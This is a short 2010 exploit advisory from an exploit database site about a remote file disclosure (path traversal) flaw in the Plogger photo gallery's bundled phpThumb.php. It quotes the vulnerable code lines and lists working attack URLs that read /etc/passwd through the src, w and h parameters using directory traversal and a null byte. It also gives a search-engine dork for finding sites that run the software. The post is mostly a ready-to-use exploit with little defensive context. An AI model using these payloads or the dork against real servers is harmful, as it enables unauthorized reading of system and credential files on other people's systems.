Plogger remote file disclosure vulnerability

2010.08.16
Credit: Mr.tro0oqy
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Plogger Remote File Disclosure Vulnerability # http://www.plogger.org/ # dork : Powered by Plogger! # author: Mr.tro0oqy (yemeni hacker) # email : t.4@windowslive.com exp : Line 117: if ($fp_source = @fopen($_GET['src'],'rb')) www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00 Line 41: $_GET['w'] = $matches[1]; Line 42: $_GET['h'] = $matches[2]; www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00 www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00 greetz : all muslems (ramadan kreem)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top